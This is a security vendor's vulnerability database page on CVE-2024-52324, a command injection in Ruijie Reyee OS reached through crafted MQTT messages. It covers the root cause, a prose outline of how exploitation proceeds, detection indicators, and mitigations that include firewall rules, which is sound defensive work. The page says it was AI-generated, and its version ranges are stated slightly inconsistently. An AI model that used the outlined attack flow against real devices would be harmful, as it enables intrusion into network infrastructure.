Skip to main content
A Leader in the 2026 Gartner® Magic Quadrant™ for Endpoint Protection. Six years running.Find Out Why
CVE Vulnerability Database
Vulnerability Database/CVE-2024-52324

CVE-2024-52324: Ruijie Reyee OS RCE Vulnerability

CVE-2024-52324 is a remote code execution vulnerability in Ruijie Reyee OS that allows attackers to execute arbitrary OS commands via malicious MQTT messages. This article covers technical details, affected versions, and mitigations.

Published:

CVE-2024-52324 Overview

CVE-2024-52324 is a critical command injection vulnerability affecting Ruijie Reyee OS, a cloud-managed networking platform used in enterprise and industrial environments. The vulnerability exists due to the use of an inherently dangerous function that processes MQTT messages without proper validation, allowing remote attackers to execute arbitrary operating system commands on affected devices.

This vulnerability poses a significant risk to organizations relying on Ruijie Reyee networking equipment, as successful exploitation could lead to complete device compromise, network pivoting, and potential lateral movement within affected infrastructure.

Critical Impact

Remote attackers can send malicious MQTT messages to execute arbitrary OS commands on vulnerable Ruijie Reyee devices, potentially compromising entire network segments without authentication.

Affected Products

  • Ruijie Reyee OS versions 2.206.x through 2.320.x (not including 2.320.x)
  • Ruijie Reyee cloud-managed networking devices running affected firmware
  • Enterprise and ICS/SCADA environments utilizing Reyee OS-based equipment

Discovery Timeline

  • 2024-12-06 - CVE-2024-52324 published to NVD
  • 2024-12-10 - Last updated in NVD database

Technical Details for CVE-2024-52324

Vulnerability Analysis

The vulnerability stems from CWE-242: Use of Inherently Dangerous Function. Ruijie Reyee OS implements MQTT (Message Queuing Telemetry Transport) functionality for device management and communication. The affected versions use a dangerous function to process incoming MQTT messages, which directly passes user-controlled input to system command execution without adequate sanitization.

MQTT is commonly used in IoT and industrial control system environments for lightweight messaging between devices and management platforms. When an attacker gains access to the MQTT broker or can inject messages into the communication channel, they can craft malicious payloads that exploit this dangerous function to achieve arbitrary command execution.

The network-accessible nature of this vulnerability means that any attacker with network access to the MQTT service can potentially exploit it without authentication, making it particularly dangerous in environments where network segmentation is insufficient.

Root Cause

The root cause is the implementation of an inherently dangerous function (CWE-242) within the MQTT message processing logic. Rather than using safe alternatives that properly sanitize or escape user input, the application directly incorporates message content into OS command execution contexts. This design flaw bypasses typical input validation controls and allows attackers to inject arbitrary commands through carefully crafted MQTT payloads.

Attack Vector

The attack vector is network-based, requiring the attacker to send specially crafted MQTT messages to vulnerable Ruijie Reyee devices. The exploitation flow typically involves:

  1. Identifying devices running vulnerable Reyee OS versions (2.206.x to 2.319.x)
  2. Gaining access to the MQTT communication channel (either through the broker or network access)
  3. Crafting malicious MQTT messages containing embedded OS commands
  4. Sending the payload to trigger command execution on target devices

The vulnerability does not require user interaction or authentication, making it exploitable through automated attacks. Once command execution is achieved, attackers can establish persistent access, exfiltrate configuration data, or pivot to other network segments.

For technical details on the vulnerability mechanism and recommended mitigations, refer to the CISA ICS Advisory ICSA-24-338-01.

Detection Methods for CVE-2024-52324

Indicators of Compromise

  • Unusual MQTT traffic patterns or malformed MQTT messages targeting Ruijie Reyee devices
  • Unexpected outbound network connections from networking equipment
  • Anomalous process execution or shell activity on Reyee OS devices
  • Log entries indicating command execution failures or unusual system calls

Detection Strategies

  • Monitor MQTT traffic (typically port 1883/8883) for unusual message patterns or payloads containing shell metacharacters
  • Implement network intrusion detection rules to identify MQTT messages with potential command injection patterns
  • Deploy behavioral analysis on network devices to detect unexpected process spawning or system command execution
  • Review device logs for authentication failures or unexpected administrative actions

Monitoring Recommendations

  • Establish baseline MQTT communication patterns and alert on deviations
  • Configure SIEM rules to correlate multiple indicators such as unusual MQTT traffic followed by outbound connections
  • Monitor firmware versions across all Ruijie Reyee devices to identify unpatched systems
  • Implement network segmentation monitoring to detect potential lateral movement from compromised devices

How to Mitigate CVE-2024-52324

Immediate Actions Required

  • Upgrade all Ruijie Reyee OS devices to version 2.320.x or later immediately
  • Isolate vulnerable devices on separate network segments until patching is complete
  • Implement strict firewall rules to limit MQTT access to trusted management systems only
  • Audit network access controls to prevent unauthorized MQTT communication with Reyee devices

Patch Information

Ruijie Networks has addressed this vulnerability in Reyee OS version 2.320.x. Organizations should update all affected devices to this version or later to remediate the vulnerability. Refer to the CISA ICS Advisory ICSA-24-338-01 for detailed patching guidance and additional vendor information.

Workarounds

  • Restrict network access to MQTT services using firewall rules and network segmentation
  • Implement MQTT broker authentication and access controls to limit message sources
  • Deploy network monitoring to detect and block suspicious MQTT traffic patterns
  • Consider disabling cloud management features temporarily if direct MQTT exposure cannot be mitigated
bash
# Example firewall rule to restrict MQTT access (adjust for your environment)
# Allow MQTT only from trusted management network
iptables -A INPUT -p tcp --dport 1883 -s 10.0.0.0/24 -j ACCEPT
iptables -A INPUT -p tcp --dport 1883 -j DROP
iptables -A INPUT -p tcp --dport 8883 -s 10.0.0.0/24 -j ACCEPT
iptables -A INPUT -p tcp --dport 8883 -j DROP

Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

Default Legacy - Prefooter | Experience the World’s Most Advanced Cybersecurity Platform

Experience the Most Advanced Cybersecurity Platform

See how the world’s most intelligent, autonomous cybersecurity platform can protect your organization today and into the future.

Try SentinelOne